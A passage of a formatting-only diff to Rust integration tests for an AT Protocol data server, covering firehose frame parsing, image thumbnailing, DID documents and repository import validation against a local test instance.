3], bytes[*pos + 4], bytes[*pos + 5], bytes[*pos + 6], bytes[*pos + 7]]); 68 - *pos += 8; 69 - Ok(val) 70 - } 71 - _ => Err(format!("Invalid additional info: {}", additional)), 72 - } 73 - } 74 - fn skip_value(bytes: &[u8], pos: &mut usize) -> Result<(), String> { 75 - if *pos >= bytes.len() { return Err("Unexpected end".into()); } 76 - let initial = bytes[*pos]; 77 - *pos += 1; 78 - let major = initial >> 5; 79 - let additional = initial & 0x1f; 80 - match major { 81 - 0 | 1 => { read_uint(bytes, pos, additional)?; Ok(()) } 82 - 2 | 3 => { 83 - let len = read_uint(bytes, pos, additional)? as usize; 84 - *pos += len; 85 - Ok(()) 86 - } 87 - 4 => { 88 - let len = read_uint(bytes, pos, additional)?; 89 - for _ in 0..len { skip_value(bytes, pos)?; } 90 - Ok(()) 91 - } 92 - 5 => { 93 - let len = read_uint(bytes, pos, additional)?; 94 - for _ in 0..len { 95 - skip_value(bytes, pos)?; 96 - skip_value(bytes, pos)?; 97 - } 98 - Ok(()) 99 - } 100 - 6 => { 101 - read_uint(bytes, pos, additional)?; 102 - skip_value(bytes, pos) 103 - } 104 - 7 => Ok(()), 105 - _ => Err(format!("Unknown major type: {}", major)), 106 - } 107 - } 108 - skip_value(bytes, &mut pos)?; 109 - Ok(pos) 110 - } 111 - 112 - fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> { 113 - let header_len = find_cbor_map_end(bytes)?; 114 - let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len]) 115 - .map_err(|e| format!("Failed to parse header: {:?}", e))?; 116 - let remaining = &bytes[header_len..]; 117 - let frame: CommitFrame = serde_ipld_dagcbor::from_slice(remaining) 118 - .map_err(|e| format!("Failed to parse commit frame: {:?}", e))?; 119 - Ok((header, frame)) 120 - } 121 - 122 - #[tokio::test] 123 - async fn test_firehose_subscription() { 124 - let client = client(); 125 - let (token, did) = create_account_and_login(&client).await; 126 - let url = format!( 127 - "ws://127.0.0.1:{}/xrpc/com.atproto.sync.subscribeRepos", 128 - app_port() 129 - ); 130 - let (mut ws_stream, _) = connect_async(&url).await.expect("Failed to connect"); 131 - let post_text = "Hello from the firehose test!"; 132 - let post_payload = json!({ 133 - "repo": did, 134 - "collection": "app.bsky.feed.post", 135 - "record": { 136 - "$type": "app.bsky.feed.post", 137 - "text": post_text, 138 - "createdAt": chrono::Utc::now().to_rfc3339(), 139 - } 140 - }); 141 - let res = client 142 - .post(format!( 143 - "{}/xrpc/com.atproto.repo.createRecord", 144 - base_url().await 145 - )) 146 - .bearer_auth(token) 147 - .json(&post_payload) 148 - .send() 149 - .await 150 - .expect("Failed to create post"); 151 - assert_eq!(res.status(), StatusCode::OK); 152 - let mut frame_opt: Option<(FrameHeader, CommitFrame)> = None; 153 - let timeout = tokio::time::timeout(std::time::Duration::from_secs(5), async { 154 - loop { 155 - let msg = ws_stream.next().await.unwrap().unwrap(); 156 - let raw_bytes = match msg { 157 - tungstenite::Message::Binary(bin) => bin, 158 - _ => continue, 159 - }; 160 - if let Ok((h, f)) = parse_frame(&raw_bytes) { 161 - if f.repo == did { 162 - frame_opt = Some((h, f)); 163 - break; 164 - } 165 - } 166 - } 167 - }) 168 - .await; 169 - assert!(timeout.is_ok(), "Timed out waiting for event for our DID"); 170 - let (header, commit) = frame_opt.expect("No matching frame found"); 171 - assert_eq!(header.op, 1); 172 - assert_eq!(header.t, "#commit"); 173 - assert_eq!(commit.ops.len(), 1); 174 - assert!(!commit.blocks.is_empty()); 175 - let op = &commit.ops[0]; 176 - let record_cid = op.cid.clone().expect("Op should have CID"); 177 - let mut car_reader = CarReader::new(Cursor::new(&commit.blocks)).await.unwrap(); 178 - let mut record_block: Option<Vec<u8>> = None; 179 - while let Ok(Some((cid, block))) = car_reader.next_block().await { 180 - if cid == record_cid { 181 - record_block = Some(block); 182 - break; 183 - } 184 - } 185 - let record_block = record_block.expect("Record block not found in CAR"); 186 - let record: Value = serde_ipld_dagcbor::from_slice(&record_block).unwrap(); 187 - assert_eq!(record["text"], post_text); 188 - ws_stream 189 - .send(tungstenite::Message::Close(None)) 190 - .await 191 - .ok(); 192 - }
+112 -46
tests/firehose_validation.rs
··· 1 1 mod common; 2 2 3 - use common::*; 4 3 use cid::Cid; 5 - use futures::{stream::StreamExt, SinkExt}; 4 + use common::*; 5 + use futures::{SinkExt, stream::StreamExt}; 6 6 use iroh_car::CarReader; 7 7 use reqwest::StatusCode; 8 8 use serde::{Deserialize, Serialize}; 9 - use serde_json::{json, Value}; 9 + use serde_json::{Value, json}; 10 10 use std::io::Cursor; 11 11 use tokio_tungstenite::{connect_async, tungstenite}; 12 12 ··· 52 52 match additional { 53 53 0..=23 => Ok(additional as u64), 54 54 24 => { 55 - if *pos >= bytes.len() { return Err("Unexpected end".into()); } 55 + if *pos >= bytes.len() { 56 + return Err("Unexpected end".into()); 57 + } 56 58 let val = bytes[*pos] as u64; 57 59 *pos += 1; 58 60 Ok(val) 59 61 } 60 62 25 => { 61 - if *pos + 2 > bytes.len() { return Err("Unexpected end".into()); } 63 + if *pos + 2 > bytes.len() { 64 + return Err("Unexpected end".into()); 65 + } 62 66 let val = u16::from_be_bytes([bytes[*pos], bytes[*pos + 1]]) as u64; 63 67 *pos += 2; 64 68 Ok(val) 65 69 } 66 70 26 => { 67 - if *pos + 4 > bytes.len() { return Err("Unexpected end".into()); } 68 - let val = u32::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3]]) as u64; 71 + if *pos + 4 > bytes.len() { 72 + return Err("Unexpected end".into()); 73 + } 74 + let val = u32::from_be_bytes([ 75 + bytes[*pos], 76 + bytes[*pos + 1], 77 + bytes[*pos + 2], 78 + bytes[*pos + 3], 79 + ]) as u64; 69 80 *pos += 4; 70 81 Ok(val) 71 82 } 72 83 27 => { 73 - if *pos + 8 > bytes.len() { return Err("Unexpected end".into()); } 74 - let val = u64::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3], bytes[*pos + 4], bytes[*pos + 5], bytes[*pos + 6], bytes[*pos + 7]]); 84 + if *pos + 8 > bytes.len() { 85 + return Err("Unexpected end".into()); 86 + } 87 + let val = u64::from_be_bytes([ 88 + bytes[*pos], 89 + bytes[*pos + 1], 90 + bytes[*pos + 2], 91 + bytes[*pos + 3], 92 + bytes[*pos + 4], 93 + bytes[*pos + 5], 94 + bytes[*pos + 6], 95 + bytes[*pos + 7], 96 + ]); 75 97 *pos += 8; 76 98 Ok(val) 77 99 } ··· 80 102 } 81 103 82 104 fn skip_value(bytes: &[u8], pos: &mut usize) -> Result<(), String> { 83 - if *pos >= bytes.len() { return Err("Unexpected end".into()); } 105 + if *pos >= bytes.len() { 106 + return Err("Unexpected end".into()); 107 + } 84 108 let initial = bytes[*pos]; 85 109 *pos += 1; 86 110 let major = initial >> 5; 87 111 let additional = initial & 0x1f; 88 112 89 113 match major { 90 - 0 | 1 => { read_uint(bytes, pos, additional)?; Ok(()) } 114 + 0 | 1 => { 115 + read_uint(bytes, pos, additional)?; 116 + Ok(()) 117 + } 91 118 2 | 3 => { 92 119 let len = read_uint(bytes, pos, additional)? as usize; 93 120 *pos += len; ··· 95 122 } 96 123 4 => { 97 124 let len = read_uint(bytes, pos, additional)?; 98 - for _ in 0..len { skip_value(bytes, pos)?; } 125 + for _ in 0..len { 126 + skip_value(bytes, pos)?; 127 + } 99 128 Ok(()) 100 129 } 101 130 5 => { ··· 228 257 println!(" tooBig: {}", frame.too_big); 229 258 println!(" repo: {}", frame.repo); 230 259 println!(" commit: {}", frame.commit); 231 - println!(" rev: {} (valid TID: {})", frame.rev, is_valid_tid(&frame.rev)); 260 + println!( 261 + " rev: {} (valid TID: {})", 262 + frame.rev, 263 + is_valid_tid(&frame.rev) 264 + ); 232 265 println!(" since: {:?}", frame.since); 233 266 println!(" blocks length: {} bytes", frame.blocks.len()); 234 267 println!(" ops count: {}", frame.ops.len()); 235 268 println!(" blobs count: {}", frame.blobs.len()); 236 - println!(" time: {} (valid format: {})", frame.time, is_valid_time_format(&frame.time)); 237 - println!(" prevData: {:?} (IMPORTANT - should have value for updates)", frame.prev_data); 269 + println!( 270 + " time: {} (valid format: {})", 271 + frame.time, 272 + is_valid_time_format(&frame.time) 273 + ); 274 + println!( 275 + " prevData: {:?} (IMPORTANT - should have value for updates)", 276 + frame.prev_data 277 + ); 238 278 239 279 assert_eq!(frame.repo, did, "Frame repo should match DID"); 240 - assert!(is_valid_tid(&frame.rev), "Rev should be valid TID format, got: {}", frame.rev); 280 + assert!( 281 + is_valid_tid(&frame.rev), 282 + "Rev should be valid TID format, got: {}", 283 + frame.rev 284 + ); 241 285 assert!(!frame.blocks.is_empty(), "Blocks should not be empty"); 242 - assert!(is_valid_time_format(&frame.time), "Time should be ISO 8601 with milliseconds and Z suffix"); 286 + assert!( 287 + is_valid_time_format(&frame.time), 288 + "Time should be ISO 8601 with milliseconds and Z suffix" 289 + ); 243 290 244 291 println!("\nOps validation:"); 245 292 for (i, op) in frame.ops.iter().enumerate() { ··· 247 294 println!(" action: {}", op.action); 248 295 println!(" path: {}", op.path); 249 296 println!(" cid: {:?}", op.cid); 250 - println!(" prev: {:?} (should be Some for updates/deletes)", op.prev); 297 + println!( 298 + " prev: {:?} (should be Some for updates/deletes)", 299 + op.prev 300 + ); 251 301 252 302 assert!( 253 303 ["create", "update", "delete"].contains(&op.action.as_str()), 254 - "Invalid action: {}", op.action 304 + "Invalid action: {}", 305 + op.action 255 306 ); 256 - assert!(op.path.contains('/'), "Path should contain collection/rkey: {}", op.path); 307 + assert!( 308 + op.path.contains('/'), 309 + "Path should contain collection/rkey: {}", 310 + op.path 311 + ); 257 312 258 313 if op.action == "create" { 259 314 assert!(op.cid.is_some(), "Create op should have cid"); ··· 270 325 "CAR should have at least one root" 271 326 ); 272 327 assert_eq!( 273 - car_header.roots()[0], frame.commit, 328 + car_header.roots()[0], 329 + frame.commit, 274 330 "First CAR root should be commit CID" 275 331 ); 276 332 ··· 292 348 if let Some(ref cid) = op.cid { 293 349 assert!( 294 350 block_cids.contains(cid), 295 - "CAR should contain op's record block: {}", cid 351 + "CAR should contain op's record block: {}", 352 + cid 296 353 ); 297 354 } 298 355 } 299 356 300 357 println!("\n=== Validation Complete ===\n"); 301 358 302 - ws_stream 303 - .send(tungstenite::Message::Close(None)) 304 - .await 305 - .ok(); 359 + ws_stream.send(tungstenite::Message::Close(None)).await.ok(); 306 360 } 307 361 308 362 #[tokio::test] ··· 402 456 println!("Frame prevData: {:?}", frame.prev_data); 403 457 404 458 for op in &frame.ops { 405 - println!("Op: action={}, path={}, cid={:?}, prev={:?}", 406 - op.action, op.path, op.cid, op.prev); 459 + println!( 460 + "Op: action={}, path={}, cid={:?}, prev={:?}", 461 + op.action, op.path, op.cid, op.prev 462 + ); 407 463 408 464 if op.action == "update" && op.path.contains("app.bsky.actor.profile") { 409 465 assert!( ··· 417 473 418 474 println!("\n=== Validation Complete ===\n"); 419 475 420 - ws_stream 421 - .send(tungstenite::Message::Close(None)) 422 - .await 423 - .ok(); 476 + ws_stream.send(tungstenite::Message::Close(None)).await.ok(); 424 477 } 425 478 426 479 #[tokio::test] ··· 475 528 let first_frame = first_frame_opt.expect("No first frame found"); 476 529 477 530 println!("\n=== First Commit ==="); 478 - println!(" prevData: {:?} (first commit may be None)", first_frame.prev_data); 479 - println!(" since: {:?} (first commit should be None)", first_frame.since); 531 + println!( 532 + " prevData: {:?} (first commit may be None)", 533 + first_frame.prev_data 534 + ); 535 + println!( 536 + " since: {:?} (first commit should be None)", 537 + first_frame.since 538 + ); 480 539 481 540 let post_payload2 = json!({ 482 541 "repo": did, ··· 519 578 let second_frame = second_frame_opt.expect("No second frame found"); 520 579 521 580 println!("\n=== Second Commit ==="); 522 - println!(" prevData: {:?} (should have value - MST root CID)", second_frame.prev_data); 523 - println!(" since: {:?} (should have value - previous rev)", second_frame.since); 581 + println!( 582 + " prevData: {:?} (should have value - MST root CID)", 583 + second_frame.prev_data 584 + ); 585 + println!( 586 + " since: {:?} (should have value - previous rev)", 587 + second_frame.since 588 + ); 524 589 525 590 assert!( 526 591 second_frame.since.is_some(), ··· 529 594 530 595 println!("\n=== Validation Complete ===\n"); 531 596 532 - ws_stream 533 - .send(tungstenite::Message::Close(None)) 534 - .await 535 - .ok(); 597 + ws_stream.send(tungstenite::Message::Close(None)).await.ok(); 536 598 } 537 599 538 600 #[tokio::test] ··· 590 652 println!("Total frame size: {} bytes", raw_bytes.len()); 591 653 592 654 fn bytes_to_hex(bytes: &[u8]) -> String { 593 - bytes.iter().map(|b| format!("{:02x}", b)).collect::<Vec<_>>().join("") 655 + bytes 656 + .iter() 657 + .map(|b| format!("{:02x}", b)) 658 + .collect::<Vec<_>>() 659 + .join("") 594 660 } 595 661 596 - println!("First 64 bytes (hex): {}", bytes_to_hex(&raw_bytes[..64.min(raw_bytes.len())])); 662 + println!( 663 + "First 64 bytes (hex): {}", 664 + bytes_to_hex(&raw_bytes[..64.min(raw_bytes.len())]) 665 + ); 597 666 598 667 let header_end = find_cbor_map_end(&raw_bytes).expect("Failed to find header end"); 599 668 ··· 604 673 605 674 println!("\n=== Analysis Complete ===\n"); 606 675 607 - ws_stream 608 - .send(tungstenite::Message::Close(None)) 609 - .await 610 - .ok(); 676 + ws_stream.send(tungstenite::Message::Close(None)).await.ok(); 611 677 }
+4 -1
tests/identity.rs
··· 301 301 assert!(!also_known_as.is_empty()); 302 302 assert!(also_known_as[0].as_str().unwrap().starts_with("at://")); 303 303 assert!(body["verificationMethods"]["atproto"].is_string()); 304 - assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer"); 304 + assert_eq!( 305 + body["services"]["atprotoPds"]["type"], 306 + "AtprotoPersonalDataServer" 307 + ); 305 308 assert!(body["services"]["atprotoPds"]["endpoint"].is_string()); 306 309 } 307 310
+80 -22
tests/image_processing.rs
··· 1 - use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE}; 1 + use bspds::image::{ 2 + DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED, 3 + THUMB_SIZE_FULL, 4 + }; 2 5 use image::{DynamicImage, ImageFormat}; 3 6 use std::io::Cursor; 4 7 5 8 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 6 9 let img = DynamicImage::new_rgb8(width, height); 7 10 let mut buf = Vec::new(); 8 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 11 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 12 + .unwrap(); 9 13 buf 10 14 } 11 15 12 16 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 13 17 let img = DynamicImage::new_rgb8(width, height); 14 18 let mut buf = Vec::new(); 15 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 19 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg) 20 + .unwrap(); 16 21 buf 17 22 } 18 23 19 24 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 20 25 let img = DynamicImage::new_rgb8(width, height); 21 26 let mut buf = Vec::new(); 22 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 27 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif) 28 + .unwrap(); 23 29 buf 24 30 } 25 31 26 32 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 27 33 let img = DynamicImage::new_rgb8(width, height); 28 34 let mut buf = Vec::new(); 29 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 35 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP) 36 + .unwrap(); 30 37 buf 31 38 } 32 39 ··· 71 78 let processor = ImageProcessor::new(); 72 79 let data = create_test_png(800, 600); 73 80 let result = processor.process(&data, "image/png").unwrap(); 74 - let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image"); 81 + let thumb = result 82 + .thumbnail_feed 83 + .expect("Should generate feed thumbnail for large image"); 75 84 assert!(thumb.width <= THUMB_SIZE_FEED); 76 85 assert!(thumb.height <= THUMB_SIZE_FEED); 77 86 } ··· 81 90 let processor = ImageProcessor::new(); 82 91 let data = create_test_png(2000, 1500); 83 92 let result = processor.process(&data, "image/png").unwrap(); 84 - let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image"); 93 + let thumb = result 94 + .thumbnail_full 95 + .expect("Should generate full thumbnail for large image"); 85 96 assert!(thumb.width <= THUMB_SIZE_FULL); 86 97 assert!(thumb.height <= THUMB_SIZE_FULL); 87 98 } ··· 91 102 let processor = ImageProcessor::new(); 92 103 let data = create_test_png(100, 100); 93 104 let result = processor.process(&data, "image/png").unwrap(); 94 - assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 95 - assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 105 + assert!( 106 + result.thumbnail_feed.is_none(), 107 + "Small image should not get feed thumbnail" 108 + ); 109 + assert!( 110 + result.thumbnail_full.is_none(), 111 + "Small image should not get full thumbnail" 112 + ); 96 113 } 97 114 98 115 #[test] ··· 125 142 let data = create_test_png(2000, 2000); 126 143 let result = processor.process(&data, "image/png"); 127 144 assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 128 - if let Err(ImageError::TooLarge { width, height, max_dimension }) = result { 145 + if let Err(ImageError::TooLarge { 146 + width, 147 + height, 148 + max_dimension, 149 + }) = result 150 + { 129 151 assert_eq!(width, 2000); 130 152 assert_eq!(height, 2000); 131 153 assert_eq!(max_dimension, 1000); ··· 173 195 let thumb = result.thumbnail_full.expect("Should have thumbnail"); 174 196 let original_ratio = 1600.0 / 800.0; 175 197 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 176 - assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 198 + assert!( 199 + (original_ratio - thumb_ratio).abs() < 0.1, 200 + "Aspect ratio should be preserved" 201 + ); 177 202 } 178 203 179 204 #[test] ··· 184 209 let thumb = result.thumbnail_full.expect("Should have thumbnail"); 185 210 let original_ratio = 800.0 / 1600.0; 186 211 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 187 - assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved"); 212 + assert!( 213 + (original_ratio - thumb_ratio).abs() < 0.1, 214 + "Aspect ratio should be preserved" 215 + ); 188 216 } 189 217 190 218 #[test] ··· 224 252 let processor = ImageProcessor::new().with_thumbnails(false); 225 253 let data = create_test_png(2000, 2000); 226 254 let result = processor.process(&data, "image/png").unwrap(); 227 - assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled"); 228 - assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled"); 255 + assert!( 256 + result.thumbnail_feed.is_none(), 257 + "Thumbnails should be disabled" 258 + ); 259 + assert!( 260 + result.thumbnail_full.is_none(), 261 + "Thumbnails should be disabled" 262 + ); 229 263 } 230 264 231 265 #[test] ··· 256 290 let processor = ImageProcessor::new(); 257 291 let data = create_test_png(500, 500); 258 292 let result = processor.process(&data, "image/png").unwrap(); 259 - assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 260 - assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image"); 293 + assert!( 294 + result.thumbnail_feed.is_some(), 295 + "Should have feed thumbnail" 296 + ); 297 + assert!( 298 + result.thumbnail_full.is_none(), 299 + "Should NOT have full thumbnail for 500px image" 300 + ); 261 301 } 262 302 263 303 #[test] ··· 265 305 let processor = ImageProcessor::new(); 266 306 let data = create_test_png(2000, 2000); 267 307 let result = processor.process(&data, "image/png").unwrap(); 268 - assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail"); 269 - assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image"); 308 + assert!( 309 + result.thumbnail_feed.is_some(), 310 + "Should have feed thumbnail" 311 + ); 312 + assert!( 313 + result.thumbnail_full.is_some(), 314 + "Should have full thumbnail for 2000px image" 315 + ); 270 316 } 271 317 272 318 #[test] ··· 274 320 let processor = ImageProcessor::new(); 275 321 let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 276 322 let result = processor.process(&at_threshold, "image/png").unwrap(); 277 - assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail"); 323 + assert!( 324 + result.thumbnail_feed.is_none(), 325 + "Exact threshold should not generate thumbnail" 326 + ); 278 327 let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 279 328 let result = processor.process(&above_threshold, "image/png").unwrap(); 280 - assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail"); 329 + assert!( 330 + result.thumbnail_feed.is_some(), 331 + "Above threshold should generate thumbnail" 332 + ); 281 333 } 282 334 283 335 #[test] ··· 285 337 let processor = ImageProcessor::new(); 286 338 let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 287 339 let result = processor.process(&at_threshold, "image/png").unwrap(); 288 - assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail"); 340 + assert!( 341 + result.thumbnail_full.is_none(), 342 + "Exact threshold should not generate thumbnail" 343 + ); 289 344 let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 290 345 let result = processor.process(&above_threshold, "image/png").unwrap(); 291 - assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail"); 346 + assert!( 347 + result.thumbnail_full.is_some(), 348 + "Above threshold should generate thumbnail" 349 + ); 292 350 }
+57 -18
tests/import_verification.rs
··· 8 8 async fn test_import_repo_requires_auth() { 9 9 let client = client(); 10 10 let res = client 11 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 11 + .post(format!( 12 + "{}/xrpc/com.atproto.repo.importRepo", 13 + base_url().await 14 + )) 12 15 .header("Content-Type", "application/vnd.ipld.car") 13 16 .body(vec![0u8; 100]) 14 17 .send() ··· 22 25 let client = client(); 23 26 let (token, _did) = create_account_and_login(&client).await; 24 27 let res = client 25 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 28 + .post(format!( 29 + "{}/xrpc/com.atproto.repo.importRepo", 30 + base_url().await 31 + )) 26 32 .bearer_auth(&token) 27 33 .header("Content-Type", "application/vnd.ipld.car") 28 34 .body(vec![0u8; 100]) ··· 39 45 let client = client(); 40 46 let (token, _did) = create_account_and_login(&client).await; 41 47 let res = client 42 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 48 + .post(format!( 49 + "{}/xrpc/com.atproto.repo.importRepo", 50 + base_url().await 51 + )) 43 52 .bearer_auth(&token) 44 53 .header("Content-Type", "application/vnd.ipld.car") 45 54 .body(vec![]) ··· 80 89 assert_eq!(export_res.status(), StatusCode::OK); 81 90 let car_bytes = export_res.bytes().await.unwrap(); 82 91 let import_res = client 83 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 92 + .post(format!( 93 + "{}/xrpc/com.atproto.repo.importRepo", 94 + base_url().await 95 + )) 84 96 .bearer_auth(&token_a) 85 97 .header("Content-Type", "application/vnd.ipld.car") 86 98 .body(car_bytes.to_vec()) ··· 132 144 assert_eq!(export_res.status(), StatusCode::OK); 133 145 let car_bytes = export_res.bytes().await.unwrap(); 134 146 let import_res = client 135 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 147 + .post(format!( 148 + "{}/xrpc/com.atproto.repo.importRepo", 149 + base_url().await 150 + )) 136 151 .bearer_auth(&token) 137 152 .header("Content-Type", "application/vnd.ipld.car") 138 153 .body(car_bytes.to_vec()) ··· 148 163 let (token, _did) = create_account_and_login(&client).await; 149 164 let oversized_body = vec![0u8; 110 * 1024 * 1024]; 150 165 let res = client 151 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 166 + .post(format!( 167 + "{}/xrpc/com.atproto.repo.importRepo", 168 + base_url().await 169 + )) 152 170 .bearer_auth(&token) 153 171 .header("Content-Type", "application/vnd.ipld.car") 154 172 .body(oversized_body) ··· 161 179 Err(e) => { 162 180 let error_str = e.to_string().to_lowercase(); 163 181 assert!( 164 - error_str.contains("broken pipe") || 165 - error_str.contains("connection") || 166 - error_str.contains("reset") || 167 - error_str.contains("request") || 168 - error_str.contains("body"), 182 + error_str.contains("broken pipe") 183 + || error_str.contains("connection") 184 + || error_str.contains("reset") 185 + || error_str.contains("request") 186 + || error_str.contains("body"), 169 187 "Expected connection error or PAYLOAD_TOO_LARGE, got: {}", 170 188 e 171 189 ); ··· 200 218 .expect("Deactivate failed"); 201 219 assert!(deactivate_res.status().is_success()); 202 220 let import_res = client 203 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 221 + .post(format!( 222 + "{}/xrpc/com.atproto.repo.importRepo", 223 + base_url().await 224 + )) 204 225 .bearer_auth(&token) 205 226 .header("Content-Type", "application/vnd.ipld.car") 206 227 .body(car_bytes.to_vec()) ··· 208 229 .await 209 230 .expect("Import failed"); 210 231 assert!( 211 - import_res.status() == StatusCode::FORBIDDEN || import_res.status() == StatusCode::UNAUTHORIZED, 232 + import_res.status() == StatusCode::FORBIDDEN 233 + || import_res.status() == StatusCode::UNAUTHORIZED, 212 234 "Expected FORBIDDEN (403) or UNAUTHORIZED (401), got {}", 213 235 import_res.status() 214 236 ); ··· 220 242 let (token, _did) = create_account_and_login(&client).await; 221 243 let invalid_car = vec![0x0a, 0xa1, 0x65, 0x72, 0x6f, 0x6f, 0x74, 0x73, 0x80]; 222 244 let res = client 223 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 245 + .post(format!( 246 + "{}/xrpc/com.atproto.repo.importRepo", 247 + base_url().await 248 + )) 224 249 .bearer_auth(&token) 225 250 .header("Content-Type", "application/vnd.ipld.car") 226 251 .body(invalid_car) ··· 240 265 write_varint(&mut car, header_cbor.len() as u64); 241 266 car.extend_from_slice(&header_cbor); 242 267 let res = client 243 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 268 + .post(format!( 269 + "{}/xrpc/com.atproto.repo.importRepo", 270 + base_url().await 271 + )) 244 272 .bearer_auth(&token) 245 273 .header("Content-Type", "application/vnd.ipld.car") 246 274 .body(car) ··· 294 322 .send() 295 323 .await 296 324 .expect("Failed to get record before export"); 297 - assert_eq!(get_res.status(), StatusCode::OK, "Record {} not found before export", rkey); 325 + assert_eq!( 326 + get_res.status(), 327 + StatusCode::OK, 328 + "Record {} not found before export", 329 + rkey 330 + ); 298 331 } 299 332 let export_res = client 300 333 .get(format!( ··· 308 341 assert_eq!(export_res.status(), StatusCode::OK); 309 342 let car_bytes = export_res.bytes().await.unwrap(); 310 343 let import_res = client 311 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 344 + .post(format!( 345 + "{}/xrpc/com.atproto.repo.importRepo", 346 + base_url().await 347 + )) 312 348 .bearer_auth(&token) 313 349 .header("Content-Type", "application/vnd.ipld.car") 314 350 .body(car_bytes.to_vec()) ··· 327 363 .expect("Failed to list records after import"); 328 364 assert_eq!(list_res.status(), StatusCode::OK); 329 365 let list_body: serde_json::Value = list_res.json().await.unwrap(); 330 - let records_after = list_body["records"].as_array().map(|a| a.len()).unwrap_or(0); 366 + let records_after = list_body["records"] 367 + .as_array() 368 + .map(|a| a.len()) 369 + .unwrap_or(0); 331 370 assert!( 332 371 records_after >= 1, 333 372 "Expected at least 1 record after import, found {}. Note: MST walk may have timing issues.",
+66 -42
tests/import_with_verification.rs
··· 1 1 mod common; 2 - use common::*; 3 2 use cid::Cid; 3 + use common::*; 4 4 use ipld_core::ipld::Ipld; 5 5 use jacquard::types::{integer::LimitedU32, string::Tid}; 6 - use k256::ecdsa::{signature::Signer, Signature, SigningKey}; 6 + use k256::ecdsa::{Signature, SigningKey, signature::Signer}; 7 7 use reqwest::StatusCode; 8 8 use serde_json::json; 9 9 use sha2::{Digest, Sha256}; ··· 60 60 multibase::encode(multibase::Base::Base58Btc, buf) 61 61 } 62 62 63 - fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value { 63 + fn create_did_document( 64 + did: &str, 65 + handle: &str, 66 + signing_key: &SigningKey, 67 + pds_endpoint: &str, 68 + ) -> serde_json::Value { 64 69 let multikey = get_multikey_from_signing_key(signing_key); 65 70 json!({ 66 71 "@context": [ ··· 83 88 }) 84 89 } 85 90 86 - fn create_signed_commit( 87 - did: &str, 88 - data_cid: &Cid, 89 - signing_key: &SigningKey, 90 - ) -> (Vec<u8>, Cid) { 91 + fn create_signed_commit(did: &str, data_cid: &Cid, signing_key: &SigningKey) -> (Vec<u8>, Cid) { 91 92 let rev = Tid::now(LimitedU32::MIN).to_string(); 92 93 let unsigned = Ipld::Map(BTreeMap::from([ 93 94 ("data".to_string(), Ipld::Link(*data_cid)), ··· 124 125 ])) 125 126 }) 126 127 .collect(); 127 - let node = Ipld::Map(BTreeMap::from([ 128 - ("e".to_string(), Ipld::List(ipld_entries)), 129 - ])); 128 + let node = Ipld::Map(BTreeMap::from([( 129 + "e".to_string(), 130 + Ipld::List(ipld_entries), 131 + )])); 130 132 let bytes = serde_ipld_dagcbor::to_vec(&node).unwrap(); 131 133 let cid = make_cid(&bytes); 132 134 (bytes, cid) ··· 134 136 135 137 fn create_record() -> (Vec<u8>, Cid) { 136 138 let record = Ipld::Map(BTreeMap::from([ 137 - ("$type".to_string(), 